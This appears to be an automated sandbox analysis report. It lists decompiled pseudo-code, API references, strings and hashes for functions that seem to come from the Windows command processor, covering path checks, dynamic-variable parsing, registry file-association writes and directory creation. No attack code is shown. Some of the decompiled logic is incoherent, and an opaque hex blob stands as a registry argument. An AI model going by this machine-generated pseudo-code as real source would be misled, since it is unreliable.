                                0x4a564720
                                0x4a56472c
                                0x00000000
                                0x00000000
                                0x4a564741
                                0x4a564743
                                0x4a56474a
                                0x4a56475d
                                0x4a564763
                                0x4a564763
                                0x4a564768
                                0x4a564771
                                0x4a564779
                                0x00000000
                                0x4a564779
                                0x4a556657
                                0x4a55666a
                                0x4a556676
                                0x4a55667d
                                0x4a556687
                                0x00000000
                                0x00000000
                                0x4a556694
                                0x4a556699
                                0x4a5566a0
                                0x4a564786
                                0x4a564799
                                0x4a5647bf
                                0x4a5647bf
                                0x00000000
                                0x4a5647bf
                                0x4a564788
                                0x4a564789
                                0x4a56478a
                                0x4a56478b
                                0x4a56478c
                                0x4a564792
                                0x4a5647b2
                                0x4a5647b9
                                0x00000000
                                0x4a5647b9
                                0x4a5566a8
                                0x4a5647a1
                                0x4a5647a9
                                0x4a5647ab
                                0x4a5647ad
                                0x4a5647b0
                                0x4a5647b1
                                0x00000000
                                0x4a5647b1
                                0x4a5566b8
                                0x00000000
                                0x4a5566b8
                                0x4a5566f7
                                0x4a5566ff
                                0x4a556701
                                0x4a556710
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a556710
                                0x4a556785
                                0x4a55f400
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a55f400
                                0x4a5564f8
                                0x4a5564fe
                                0x4a556503
                                0x00000000
                                0x00000000
                                0x4a556509
                                0x4a556510
                                0x4a55f6d1
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a55f6d7
                                0x4a556516
                                0x4a55651c
                                0x4a55651f
                                0x00000000

                                APIs
                                  • Part of subcall function 4A554D4E: _get_osfhandle.MSVCRT ref: 4A554D79
                                  • Part of subcall function 4A554D4E: SetFilePointer.KERNEL32(00000000,4A554C54,00000000,00000000,00000104,00000000,00000114), ref: 4A554D81
                                • _get_osfhandle.MSVCRT ref: 4A5564C5
                                • GetFileSize.KERNEL32(00000000), ref: 4A5564CD
                                  • Part of subcall function 4A552B0D: iswspace.MSVCRT ref: 4A552B1F
                                • _wcsnicmp.MSVCRT ref: 4A5564F8
                                • _get_osfhandle.MSVCRT ref: 4A55672B
                                • SetFilePointer.KERNEL32(00000000), ref: 4A55672F
                                • _get_osfhandle.MSVCRT ref: 4A556763
                                • iswspace.MSVCRT ref: 4A55F6C8
                                  • Part of subcall function 4A553AB3: _close.MSVCRT ref: 4A553AED
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _get_osfhandle$File$Pointeriswspace$Size_close_wcsnicmp
                                • String ID: :EOF
                                • API String ID: 2298062502-551370653
                                • Opcode ID: b31bd36cf77c3621354217b55a580e78fcfc1e398912f4e487cac514d948ba4e
                                • Instruction ID: bf183a31af0a99b90a91defff696d6b908684b310d23e972f86a8a6f41e606e7
                                • Opcode Fuzzy Hash: b31bd36cf77c3621354217b55a580e78fcfc1e398912f4e487cac514d948ba4e
                                • Instruction Fuzzy Hash: 5451F9B1D01259AFDB20AF60CF84AA9BBBCEF05354F11055BE506EB558DB709E81CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A556A35, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 115COMMON
                                Download Yara Rule
                                C-Code - Quality: 86%
                                			E4A556A35(void* __ebx, void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				char _v1040;
				intOrPtr _v1042;
				short _v1044;
				short _v1046;
				short _v1048;
				char _v1640;
				WCHAR* _v1644;
				char _v1648;
				void* __edi;
				void* __esi;
				signed int _t24;
				signed int _t26;
				wchar_t* _t34;
				wchar_t* _t35;
				signed int _t36;
				short* _t41;
				void* _t51;
				signed int _t57;
				void* _t61;
				WCHAR* _t62;
				void* _t63;
				signed int _t64;
				signed int _t67;

				_t61 = __edx;
				_t51 = __ebx;
				_t24 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t24 ^ _t67;
				_t62 = _a4;
				if(_t62 == 0) {
					_t26 = 0;
					L8:
					return E4A5513A9(_t26, _t51, _v8 ^ _t67, _t61, _t62, _t63);
				}
				_push(_t63);
				_t64 = GetFullPathNameW(E4A552598(__ecx, _t62), 0x208,  &_v1048,  &_v1644);
				if(_t64 == 0) {
					L6:
					_t26 = _t64;
					L7:
					_pop(_t63);
					goto L8;
				}
				if(wcsncmp( &_v1048, L"\\\\.\\", 4) == 0) {
					_t34 =  &_v1040;
					_v1644 = _t34;
					_t35 = wcsstr(_t62, _t34);
					_v1644 = _t35;
					if(_t35 == 0 || _t35 <= _t62) {
						_t36 = GetFileAttributesW(_t62);
						_t57 = _t36;
					} else {
						 *_t35 = 0;
						_t57 = GetFileAttributesW(_t62);
						 *_v1644 =  *_t35 & 0x0000ffff;
						_t36 = _t57;
					}
					asm("sbb eax, eax");
					_t26 =  ~(_t36 + 1) & _t57;
					goto L7;
				}
				_t41 = _v1644;
				if(_t41 == 0 ||  *_t41 == 0) {
					_t64 = 0 | GetFileAttributesW( &_v1048) != 0xffffffff;
				} else {
					_t64 = E4A553117( &_v1048, 0x37,  &_v1640,  &_v1648) & 0x000000ff;
					E4A552F5C(_v1648);
					if(_t64 == 0) {
						if(_v1046 == 0x5c || _v1046 == 0x3a && _v1044 == 0x5c && _v1042 == _t64) {
							if(GetDriveTypeW( &_v1048) <= 1) {
								goto L6;
							}
							_t64 = 1;
						}
					}
				}
			}



























                                0x4a556a35
                                0x4a556a35
                                0x4a556a40
                                0x4a556a47
                                0x4a556a4b
                                0x4a556a50
                                0x4a569db6
                                0x4a556ae5
                                0x4a556af1
                                0x4a556af1
                                0x4a556a56
                                0x4a556a77
                                0x4a556a7b
                                0x4a556ae2
                                0x4a556ae2
                                0x4a556ae4
                                0x4a556ae4
                                0x00000000
                                0x4a556ae4
                                0x4a556a96
                                0x4a569dbd
                                0x4a569dc5
                                0x4a569dcb
                                0x4a569dd3
                                0x4a569ddb
                                0x4a569e00
                                0x4a569e06
                                0x4a569de1
                                0x4a569de7
                                0x4a569df0
                                0x4a569df8
                                0x4a569dfb
                                0x4a569dfb
                                0x4a569e0b
                                0x4a569e0d
                                0x00000000
                                0x4a569e0d
                                0x4a556a9c
                                0x4a556aa4
                                0x4a569e31
                                0x4a556ab4
                                0x4a556ad6
                                0x4a556ad9
                                0x4a556ae0
                                0x4a556b11
                                0x4a556b40
                                0x00000000
                                0x00000000
                                0x4a569e16
                                0x4a569e16
                                0x4a556b11
                                0x4a556ae0

                                APIs
                                • GetFullPathNameW.KERNEL32(00000000,?,00000208,?,?), ref: 4A556A71
                                • wcsncmp.MSVCRT(?,\\.\,00000004), ref: 4A556A8B
                                • GetDriveTypeW.KERNEL32(?,?,?,00000037,?,?), ref: 4A556B37
                                • wcsstr.MSVCRT ref: 4A569DCB
                                • GetFileAttributesW.KERNEL32(?), ref: 4A569DEA
                                • GetFileAttributesW.KERNEL32(?), ref: 4A569E23
                                  • Part of subcall function 4A552F5C: FindClose.KERNEL32(4A574210,?,4A5695B1,?,00000000,00000000,?,4A56FCAB,4A563723,4A58C642,4A551BBC,4A58C642,00002002,4A57C640,00000000,00000000), ref: 4A552F96
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AttributesFile$CloseDriveFindFullNamePathTypewcsncmpwcsstr
                                • String ID: :$\$\\.\
                                • API String ID: 3324058816-2289549094
                                • Opcode ID: 168bf023c6fbf1dd8d67a61c794309e03a6b54b576ede7801e7227a0ff4732f4
                                • Instruction ID: 780b4766d6352e467ff3a4d2bf7e8788ee57c003e5a74e04285a6f4e68a1c0b4
                                • Opcode Fuzzy Hash: 168bf023c6fbf1dd8d67a61c794309e03a6b54b576ede7801e7227a0ff4732f4
                                • Instruction Fuzzy Hash: F741D2B1D01218DBCB20AB74CE44AAB7BBCAF85350F0541A7E509E7558FB71DE80DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A552CB4, Relevance: 16.6, APIs: 6, Strings: 5, Instructions: 67COMMON
                                Download Yara Rule
                                C-Code - Quality: 91%
                                			E4A552CB4(signed int __eax, void* __ecx, void* __esi) {
				signed char _t48;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				signed int _t57;
				int _t58;
				int _t60;
				int _t62;
				signed int _t70;
				int _t71;
				int _t72;
				signed int _t74;
				void* _t75;
				void* _t76;
				void* _t78;
				int _t84;
				void* _t86;
				signed int _t87;
				long _t88;
				int _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				signed int _t93;

				_t91 = __esi;
				_t48 = __eax & 0x00007300;
				 *((intOrPtr*)(_t48 - 0x2e7bf0f0)) =  *((intOrPtr*)(_t48 - 0x2e7bf0f0)) + __ecx;
				if((_t48 & 0x00000010) != 0) {
					_t74 =  *(_t93 - 0x214);
					 *((short*)(_t93 + _t74 * 2 - 0x20c)) = 0;
				}
				_t87 = E4A5540F2(0x2a, _t93 - 0x20c,  *(_t93 - 0x218));
				 *(_t93 - 0x214) = _t87;
				if(_t87 == 0xffffffff) {
					_t52 = E4A5540F2(0x2d, _t93 - 0x20c,  *(_t93 - 0x218));
					__eflags = _t52 - 0x2d;
					if(_t52 != 0x2d) {
						goto L5;
					}
					goto L10;
				} else {
					if(_t87 == 0x14) {
						 *((intOrPtr*)(_t91 + 0x40)) = 1;
					}
					L5:
					 *(_t93 - 0x20d) = 0;
					 *((char*)(_t93 - 0x20e)) = 0;
					if(_t87 == 0xffffffff) {
						_t74 = 0;
						__eflags = 0;
						 *((char*)(_t93 - 0x20f)) = 0;
						do {
							_t53 =  *(_t91 + 0x38);
							_t88 =  *(_t53 + _t74 * 2) & 0x0000ffff;
							__eflags = _t88;
							if(_t88 == 0) {
								L24:
								 *((char*)(_t93 - 0x20f)) = 1;
								goto L22;
							}
							__eflags = _t88 - 0x22;
							if(_t88 == 0x22) {
								__eflags =  *(_t93 - 0x20d);
								_t70 = _t53 & 0xffffff00 |  *(_t93 - 0x20d) == 0x00000000;
								__eflags = _t70;
								 *(_t93 - 0x20d) = _t70;
								 *((char*)(_t93 - 0x20e)) = _t70 == 0;
							}
							__eflags =  *(_t93 - 0x20d);
							if( *(_t93 - 0x20d) != 0) {
								L21:
								_t74 = _t74 + 1;
								__eflags = _t74;
								 *((char*)(_t93 - 0x20e)) = 0;
								goto L22;
							}
							__eflags =  *((char*)(_t93 - 0x20e));
							if( *((char*)(_t93 - 0x20e)) != 0) {
								goto L21;
							}
							_t71 = iswspace(_t88);
							__eflags = _t71;
							if(_t71 != 0) {
								goto L24;
							}
							_t72 = E4A5518EB("=,;", _t88);
							__eflags = _t72;
							if(_t72 != 0) {
								goto L24;
							}
							__eflags = _t88 -  *0x4a59065c; // 0x2f
							if(__eflags == 0) {
								goto L24;
							}
							goto L21;
							L22:
							__eflags =  *((char*)(_t93 - 0x20f));
						} while ( *((char*)(_t93 - 0x20f)) == 0);
					}
					_t54 =  *(_t91 + 0x38);
					_t11 = _t54 + 2; // 0x6
					_t86 = _t11;
					do {
						_t78 =  *_t54;
						_t54 = _t54 + 2;
					} while (_t78 != 0);
					_t57 = _t54 - _t86 >> 1;
					if(_t74 != _t57) {
						_t35 = _t57 + 1; // 0x7
						_t89 = _t35;
						_t58 =  *(_t91 + 0x3c);
						__eflags = _t58;
						if(_t58 == 0) {
							L32:
							_t60 = E4A552041(_t89 + _t89);
							_t75 = _t74 + _t74;
							 *(_t93 - 0x218) = _t60;
							E4A55185A(_t60, _t89,  *(_t91 + 0x38) + _t75);
							_t62 =  *(_t91 + 0x3c);
							__eflags = _t62;
							if(_t62 != 0) {
								E4A5520A9(_t91,  *(_t93 - 0x218), _t89, _t62);
							}
							 *(_t91 + 0x3c) =  *(_t93 - 0x218);
							 *((short*)(_t75 +  *(_t91 + 0x38))) = 0;
							goto L9;
						}
						_t86 = _t58 + 2;
						do {
							_t84 =  *_t58;
							_t58 = _t58 + 2;
							__eflags = _t84;
						} while (_t84 != 0);
						__eflags = _t89;
						goto L32;
					}
					L9:
					_t52 =  *(_t93 - 0x214);
					L10:
					_pop(_t90);
					_pop(_t92);
					_pop(_t76);
					return E4A5513A9(_t52, _t76,  *(_t93 - 4) ^ _t93, _t86, _t90, _t92);
				}
			}



























                                0x4a552cb4
                                0x4a552cb4
                                0x4a552cb9
                                0x4a552cbc
                                0x4a55555d
                                0x4a555565
                                0x4a555565
                                0x4a5542a7
                                0x4a5542a9
                                0x4a5542b2
                                0x4a5554c1
                                0x4a5554c6
                                0x4a5554c9
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5542b8
                                0x4a5542bb
                                0x4a55660b
                                0x4a55660b
                                0x4a5542c1
                                0x4a5542c1
                                0x4a5542c8
                                0x4a5542d2
                                0x4a5554d4
                                0x4a5554d4
                                0x4a5554d6
                                0x4a5554dc
                                0x4a5554dc
                                0x4a5554df
                                0x4a5554e3
                                0x4a5554e6
                                0x4a55553e
                                0x4a55553e
                                0x00000000
                                0x4a55553e
                                0x4a5554e8
                                0x4a5554ec
                                0x4a55c13d
                                0x4a55c144
                                0x4a55c147
                                0x4a55c149
                                0x4a55c14f
                                0x4a55c14f
                                0x4a5554f2
                                0x4a5554f9
                                0x4a555528
                                0x4a555528
                                0x4a555528
                                0x4a555529
                                0x00000000
                                0x4a555529
                                0x4a5554fb
                                0x4a555502
                                0x00000000
                                0x00000000
                                0x4a555505
                                0x4a55550c
                                0x4a55550e
                                0x00000000
                                0x00000000
                                0x4a555516
                                0x4a55551b
                                0x4a55551d
                                0x00000000
                                0x00000000
                                0x4a55551f
                                0x4a555526
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a555530
                                0x4a555530
                                0x4a555530
                                0x4a555539
                                0x4a5542d8
                                0x4a5542db
                                0x4a5542db
                                0x4a5542de
                                0x4a5542de
                                0x4a5542e2
                                0x4a5542e3
                                0x4a5542ea
                                0x4a5542ee
                                0x4a567145
                                0x4a567145
                                0x4a567148
                                0x4a56714b
                                0x4a56714d
                                0x4a567162
                                0x4a567166
                                0x4a56716e
                                0x4a567175
                                0x4a56717b
                                0x4a567180
                                0x4a567183
                                0x4a567185
                                0x4a56718f
                                0x4a56718f
                                0x4a56719a
                                0x4a5671a2
                                0x00000000
                                0x4a5671a2
                                0x4a56714f
                                0x4a567152
                                0x4a567152
                                0x4a567156
                                0x4a567157
                                0x4a567157
                                0x4a567160
                                0x00000000
                                0x4a567160
                                0x4a5542f4
                                0x4a5542f4
                                0x4a5542fa
                                0x4a5542fd
                                0x4a5542fe
                                0x4a554301
                                0x4a554308
                                0x4a554308

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _wcsicmp
                                • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$TIME
                                • API String ID: 2081463915-737311213
                                • Opcode ID: fa1ae7507590af381aae88aa945d45dfad7e08b5ba8708fc253e076afb9c7abf
                                • Instruction ID: 03a5e498bdc2b11a2b0d7fee65295ae860f59d2b5873f83c209a95f3a5845d9e
                                • Opcode Fuzzy Hash: fa1ae7507590af381aae88aa945d45dfad7e08b5ba8708fc253e076afb9c7abf
                                • Instruction Fuzzy Hash: BB11E17654E3437EFB094A35EE51A592FA8EF42268F21012BF906E94F9FF21D900C358
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56DB5E, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 185registryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 78%
                                			E4A56DB5E(void* _a4, intOrPtr* _a8, int _a12) {
				signed int _v8;
				short _v528;
				intOrPtr* _v532;
				void* _v536;
				int _v540;
				void* _v544;
				long _v548;
				signed int _v552;
				int _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				intOrPtr* _t45;
				signed int _t48;
				signed short* _t59;
				int _t62;
				int _t71;
				long _t78;
				signed short _t80;
				intOrPtr _t86;
				char* _t87;
				void* _t93;
				void* _t96;
				char _t97;
				int _t99;
				char* _t100;
				signed short* _t102;
				signed int _t105;

				_t42 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t42 ^ _t105;
				_v544 = _a4;
				_t45 = _a8;
				_v532 = _t45;
				_v540 = _a12;
				_t96 = _t45 + 2;
				do {
					_t86 =  *_t45;
					_t45 = _t45 + 2;
				} while (_t86 != 0);
				_t87 = L"\\Shell\\Open\\Command";
				_t48 = _t45 - _t96 >> 1;
				_t100 =  &(_t87[2]);
				do {
					_t97 =  *_t87;
					_t87 =  &(_t87[2]);
				} while (_t97 != 0);
				_t90 = _t87 - _t100 >> 1;
				if((_t87 - _t100 >> 1) + _t48 + 1 <= 0x104) {
					E4A55185A( &_v528, 0x104, _v532);
					E4A5520A9(0x104,  &_v528, 0x104, L"\\Shell\\Open\\Command");
					_t99 = 0x2000000;
					_t102 = RegOpenKeyExW(_v544,  &_v528, 0, 0x2000000,  &_v536);
					if(_t102 == 0) {
						L18:
						_t99 = _v540;
						if(_t99 == 0 ||  *_t99 == 0) {
							_t102 = RegDeleteValueW(_v536, 0);
							if(_t102 != 0) {
								E4A556D44(_t90, 0x400023a5, 1, _v532);
								goto L27;
							}
						} else {
							_t62 = _t99;
							_t97 = _t62 + 2;
							do {
								_t93 =  *_t62;
								_t62 = _t62 + 2;
							} while (_t93 != 0);
							_t102 = RegSetValueExW(_v536, E4A553AFC, 0, 2, _t99, (_t62 - _t97 >> 1) + (_t62 - _t97 >> 1) + 2);
							if(_t102 != 0) {
								_push(0);
								_push(_t102);
								E4A556D44(_t93);
								E4A556D44(_t93, 0x235d, 1, _v532);
							} else {
								_push(_t99);
								E4A5558F3(L"%s=%s\r\n", _v532);
								L27:
							}
						}
						RegCloseKey(_v536);
						goto L29;
					} else {
						_t71 = _v540;
						if(_t71 == 0 ||  *_t71 == 0) {
							E4A556D44(_t90, 0x400023a5, 1, _v532);
							L29:
							_t59 = _t102;
						} else {
							_t102 =  &_v528;
							L12:
							while(1) {
								while( *_t102 != 0) {
									if( *_t102 != 0x5c) {
										_t102 =  &(_t102[1]);
										continue;
									}
									break;
								}
								_v552 =  *_t102 & 0x0000ffff;
								 *_t102 = 0;
								_t78 = RegCreateKeyExW(_v544,  &_v528, 0, 0, 0, _t99, 0,  &_v536,  &_v556);
								_v548 = _t78;
								if(_t78 != 0) {
									E4A556D44(_t90, 0x400023a5, 1, _v532);
									_t59 = _v548;
								} else {
									_t80 = _v552;
									if(_t80 == 0) {
										goto L18;
									} else {
										 *_t102 = _t80;
										_t102 =  &(_t102[1]);
										RegCloseKey(_v536);
										continue;
									}
								}
								goto L30;
							}
						}
					}
				} else {
					_push(0);
					_push(0x400023db);
					E4A556D44(_t90);
					_t59 = 1;
				}
				L30:
				return E4A5513A9(_t59, 0, _v8 ^ _t105, _t97, _t99, _t102);
			}
































                                0x4a56db69
                                0x4a56db70
                                0x4a56db7a
                                0x4a56db80
                                0x4a56db85
                                0x4a56db8b
                                0x4a56db91
                                0x4a56db96
                                0x4a56db96
                                0x4a56db9a
                                0x4a56db9b
                                0x4a56dba7
                                0x4a56dba9
                                0x4a56dbab
                                0x4a56dbae
                                0x4a56dbae
                                0x4a56dbb2
                                0x4a56dbb3
                                0x4a56dbba
                                0x4a56dbc7
                                0x4a56dbec
                                0x4a56dbfa
                                0x4a56dc06
                                0x4a56dc20
                                0x4a56dc24
                                0x4a56dcec
                                0x4a56dcec
                                0x4a56dcf4
                                0x4a56dd6c
                                0x4a56dd70
                                0x4a56dd7f
                                0x00000000
                                0x4a56dd7f
                                0x4a56dcfb
                                0x4a56dcfb
                                0x4a56dcfd
                                0x4a56dd00
                                0x4a56dd00
                                0x4a56dd04
                                0x4a56dd05
                                0x4a56dd28
                                0x4a56dd2c
                                0x4a56dd41
                                0x4a56dd42
                                0x4a56dd43
                                0x4a56dd55
                                0x4a56dd2e
                                0x4a56dd2e
                                0x4a56dd3a
                                0x4a56dd84
                                0x4a56dd84
                                0x4a56dd2c
                                0x4a56dd8d
                                0x00000000
                                0x4a56dc2a
                                0x4a56dc2a
                                0x4a56dc32
                                0x4a56dcdf
                                0x4a56dd93
                                0x4a56dd93
                                0x4a56dc41
                                0x4a56dc41
                                0x00000000
                                0x4a56dc51
                                0x4a56dc51
                                0x4a56dc4d
                                0x4a56dc50
                                0x00000000
                                0x4a56dc50
                                0x00000000
                                0x4a56dc4d
                                0x4a56dc59
                                0x4a56dc61
                                0x4a56dc84
                                0x4a56dc8a
                                0x4a56dc92
                                0x4a56dcbf
                                0x4a56dcc4
                                0x4a56dc94
                                0x4a56dc94
                                0x4a56dc9d
                                0x00000000
                                0x4a56dc9f
                                0x4a56dca5
                                0x4a56dca9
                                0x4a56dcaa
                                0x00000000
                                0x4a56dcaa
                                0x4a56dc9d
                                0x00000000
                                0x4a56dc92
                                0x4a56dc51
                                0x4a56dc32
                                0x4a56dbc9
                                0x4a56dbc9
                                0x4a56dbca
                                0x4a56dbcf
                                0x4a56dbd8
                                0x4a56dbd8
                                0x4a56dd95
                                0x4a56dda3

                                APIs
                                • RegOpenKeyExW.KERNEL32 ref: 4A56DC1A
                                • RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,effff13300300c3010000020000112001000000fe0e00003800000000fe0c00004508000000820100000c010000b000000090000000050000001a000000730100004e010000387@010000032825020006395b000000200700000038c1ffffff02280f0200067c3f0000047b3@0000040374250000026fbc0000067c3f0000047b3@0,00000000,?,?), ref: 4A56DC84
                                • RegCloseKey.KERNEL32(?), ref: 4A56DCAA
                                • RegSetValueExW.KERNEL32 ref: 4A56DD22
                                • RegDeleteValueW.KERNEL32 ref: 4A56DD66
                                • RegCloseKey.KERNEL32(?), ref: 4A56DD8D
                                Strings
                                • %s=%s, xrefs: 4A56DD35
                                • effff13300300c3010000020000112001000000fe0e00003800000000fe0c00004508000000820100000c010000b000000090000000050000001a000000730100004e010000387@010000032825020006395b000000200700000038c1ffffff02280f0200067c3f0000047b3@0000040374250000026fbc0000067c3f0000047b3@0, xrefs: 4A56DC06, 4A56DC0B, 4A56DC73
                                • \Shell\Open\Command, xrefs: 4A56DBA0, 4A56DBF1
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseValue$CreateDeleteOpen
                                • String ID: %s=%s$\Shell\Open\Command$effff13300300c3010000020000112001000000fe0e00003800000000fe0c00004508000000820100000c010000b000000090000000050000001a000000730100004e010000387@010000032825020006395b000000200700000038c1ffffff02280f0200067c3f0000047b3@0000040374250000026fbc0000067c3f0000047b3@0
                                • API String ID: 4081037667-3045163648
                                • Opcode ID: 7761207e4639d668bf4ad234dd0a74af70e86c1c1b2079e4308e5d912e9eb1d1
                                • Instruction ID: 5fc216e6e096a724535f5f13e3462c15b0a5d39e59dbc43f5254e687a0eb549b
                                • Opcode Fuzzy Hash: 7761207e4639d668bf4ad234dd0a74af70e86c1c1b2079e4308e5d912e9eb1d1
                                • Instruction Fuzzy Hash: 0751D87290011DABDB21BF54CE88EEA7BB9FF48304F050999E64DEB155E6718E80CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55F83C, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 168COMMON
                                Download Yara Rule
                                C-Code - Quality: 45%
                                			E4A55F83C(void* __ebx, void* __edx, void* __esi, WCHAR* _a4) {
				signed int _v8;
				char _v522;
				signed short _v524;
				short _v526;
				short _v528;
				WCHAR* _v532;
				void* __edi;
				signed int _t24;
				long _t28;
				long _t29;
				void* _t32;
				signed short* _t37;
				int _t39;
				signed short* _t40;
				signed short* _t41;
				int _t43;
				long _t45;
				void* _t47;
				void* _t50;
				void* _t60;
				WCHAR* _t61;
				void* _t62;
				void* _t64;
				signed int _t65;

				_t62 = __esi;
				_t60 = __edx;
				_t50 = __ebx;
				_t24 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t24 ^ _t65;
				_t61 = _a4;
				if(_t61[1] != 0x3a) {
					L2:
					_push(_t50);
					_push(_t62);
					_t28 = GetFullPathNameW(_t61, 0x104,  &_v528,  &_v532);
					if(_t28 == 0) {
						_push(0);
						_t29 = GetLastError();
						goto L29;
					} else {
						if(_t28 >= 0x104) {
							_push(_t61);
							_push(1);
							_push(0x400023d9);
							__eflags = _t28 + 1;
							goto L32;
						} else {
							if(CreateDirectoryW(_t61, 0) == 0) {
								_t29 = GetLastError();
								__eflags = _t29 - 0xb7;
								if(_t29 == 0xb7) {
									_push(_t61);
									_push(1);
									_push(0x235c);
									L32:
									E4A556D44(_t52);
									goto L49;
								} else {
									__eflags = _t29 - 3;
									if(_t29 != 3) {
										L34:
										_push(0);
										L29:
										_push(_t29);
										goto L48;
									} else {
										__eflags =  *0x4a574081; // 0x0
										if(__eflags == 0) {
											L16:
											_push(0);
											_push(0x52);
											L48:
											E4A556D44(_t52);
											L49:
											_t32 = 1;
											goto L6;
										} else {
											__eflags = _v526 - 0x3a;
											_t61 = 0x5c;
											_t64 = 2;
											if(_v526 != 0x3a) {
												__eflags = _v528 - _t61;
												if(_v528 != _t61) {
													goto L16;
												} else {
													__eflags = _v526 - _t61;
													if(_v526 != _t61) {
														goto L16;
													} else {
														_t37 =  &_v524;
														_v532 = _t37;
														__eflags = _v524;
														if(_v524 == 0) {
															goto L21;
														} else {
															_t52 = _v524 & 0x0000ffff;
															while(1) {
																__eflags = _t52 - _t61;
																if(_t52 == _t61) {
																	break;
																}
																_t37 = _t37 + _t64;
																_v532 = _t37;
																_t52 =  *_t37 & 0x0000ffff;
																__eflags = _t52;
																if(_t52 != 0) {
																	continue;
																}
																break;
															}
															__eflags =  *_t37;
															if( *_t37 == 0) {
																goto L21;
															} else {
																_t40 = _t37 + _t64;
																_v532 = _t40;
																_t52 =  *_t40 & 0x0000ffff;
																__eflags = _t52;
																if(_t52 == 0) {
																	goto L21;
																} else {
																	while(1) {
																		__eflags = _t52 - _t61;
																		if(_t52 == _t61) {
																			break;
																		}
																		_t40 = _t40 + _t64;
																		_v532 = _t40;
																		_t52 =  *_t40 & 0x0000ffff;
																		__eflags = _t52;
																		if(_t52 != 0) {
																			continue;
																		}
																		break;
																	}
																	__eflags =  *_t40;
																	if( *_t40 != 0) {
																		goto L26;
																	} else {
																		goto L21;
																	}
																}
															}
														}
													}
												}
											} else {
												_t41 =  &_v522;
												L13:
												_v532 = _t41;
												while(1) {
													L20:
													_t52 =  *_t41 & 0x0000ffff;
													__eflags = _t52;
													if(_t52 != 0) {
														goto L17;
													} else {
														break;
													}
													while(1) {
														L17:
														__eflags = _t52 - _t61;
														if(_t52 == _t61) {
															break;
														}
														_t41 = _t41 + _t64;
														_v532 = _t41;
														_t52 =  *_t41 & 0x0000ffff;
														__eflags = _t52;
														if(_t52 != 0) {
															continue;
														} else {
															__eflags =  *_t41 - _t61;
															if( *_t41 == _t61) {
																break;
															} else {
																goto L20;
															}
														}
														goto L50;
													}
													_t52 = 0;
													 *_t41 = 0;
													_t43 = CreateDirectoryW( &_v528, 0);
													__eflags = _t43;
													if(_t43 != 0) {
														L25:
														 *_v532 = _t61;
														_t40 = _v532;
														L26:
														_t41 = _t40 + _t64;
														goto L13;
													} else {
														_t45 = GetLastError();
														__eflags = _t45 - 0xb7;
														if(_t45 != 0xb7) {
															goto L16;
														} else {
															goto L25;
														}
													}
													goto L50;
												}
												L21:
												_t39 = CreateDirectoryW( &_v528, 0);
												__eflags = _t39;
												if(_t39 != 0) {
													goto L5;
												} else {
													_t29 = GetLastError();
													__eflags = _t29 - 0xb7;
													if(_t29 == 0xb7) {
														goto L5;
													} else {
														goto L34;
													}
												}
											}
										}
									}
								}
								L50:
							} else {
								L5:
								_t32 = 0;
							}
						}
					}
					L6:
					_pop(_t62);
					_pop(_t50);
				} else {
					_t47 = E4A552B68( *_t61 & 0x0000ffff);
					if(_t47 == 0) {
						_push(_t47);
						_push(0xf);
						E4A556D44(_t52);
						_t32 = 1;
					} else {
						goto L2;
					}
				}
				return E4A5513A9(_t32, _t50, _v8 ^ _t65, _t60, _t61, _t62);
				goto L50;
			}



























                                0x4a55f83c
                                0x4a55f83c
                                0x4a55f83c
                                0x4a55f847
                                0x4a55f84e
                                0x4a55f852
                                0x4a55f85a
                                0x4a55f86d
                                0x4a55f86d
                                0x4a55f86e
                                0x4a55f884
                                0x4a55f88e
                                0x4a568033
                                0x4a568034
                                0x00000000
                                0x4a55f894
                                0x4a55f896
                                0x4a568040
                                0x4a568041
                                0x4a568043
                                0x4a568047
                                0x00000000
                                0x4a55f89c
                                0x4a55f8a6
                                0x4a56241a
                                0x4a562420
                                0x4a562425
                                0x4a568055
                                0x4a568056
                                0x4a568058
                                0x4a568048
                                0x4a568048
                                0x00000000
                                0x4a56242b
                                0x4a56242b
                                0x4a56242e
                                0x4a56805f
                                0x4a56805f
                                0x4a56803a
                                0x4a56803a
                                0x00000000
                                0x4a562434
                                0x4a562434
                                0x4a56243a
                                0x4a562465
                                0x4a562465
                                0x4a562466
                                0x4a568103
                                0x4a568103
                                0x4a56810a
                                0x4a56810c
                                0x00000000
                                0x4a56243c
                                0x4a56243c
                                0x4a562446
                                0x4a562449
                                0x4a56244a
                                0x4a568062
                                0x4a568069
